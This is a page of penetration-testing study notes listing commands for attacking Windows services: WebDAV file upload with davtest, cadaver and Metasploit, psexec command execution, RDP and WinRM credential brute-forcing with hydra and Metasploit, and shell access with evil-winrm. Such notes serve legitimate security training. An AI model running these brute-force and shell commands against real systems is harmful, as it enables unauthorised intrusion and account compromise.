Windows

Webdav

`davtest`

to scan the webdav..... type in the directory path to the tool :

davtest -url http://$IP/webdav -auth username:password

cadaver

to interact with the server (ie. to put,download, etc) files.

cadaver http://$IP/dir #dir = webdav directory

metasploit

exploiting with msfconsole (automating davtest + cadaver)

exploit/windows/iis/iis_webdav_upload_asp 

#note if extension allowed is different this wont work
#only works if asp is executable on the server
# to check what extensions are executable ...... use davtest

set HttpPassword $username
set HttpUsername $password
set RHOSTS $IP
set PATH /webdav_dir/random_name.asp

psexec

https://github.com/fortra/impacket/blob/master/examples/psexec.py
used to run cmd in windows via samba (smb)

psexec.py username@ip <cmd> #cmd.exe

RDP

what is rdp?

What is the Remote Desktop Protocol (RDP)? | Cloudflarewww.cloudflare.com

some tricks to pentest

https://hacktricks.boitatech.com.br/pentesting/pentesting-rdphacktricks.boitatech.com.br

msfconsole

to scan if a port is running rdp or not

use auxiliary/scanner/rdp/rdp_scanner

set rhosts $IP
set rport $port
run

hydra

bruteforce rdp

hydra -L /path/to/users.txt -P /path/to/wordlists.txt rdp://$IP:$PORT/

xfreerdp

connect to rdp port

xfreerdp /u:$username /p:$password /v:$IP:$PORT

Winrm

msfconsole

bruteforce winrm

use auxiliary/scanner/winrm/winrm_login

set RHOSTS $IP
set USER_FILE /path/to/users.txt
set PASS_FILE /path/to/passwd.txt

evil-winrm

connect & get shell

evil-winrm.rb -u $user -p '$passwd' -i $IP

PreviousChecklist (priv esc)NextChecklist (Priv Esc)

Last updated 1 year ago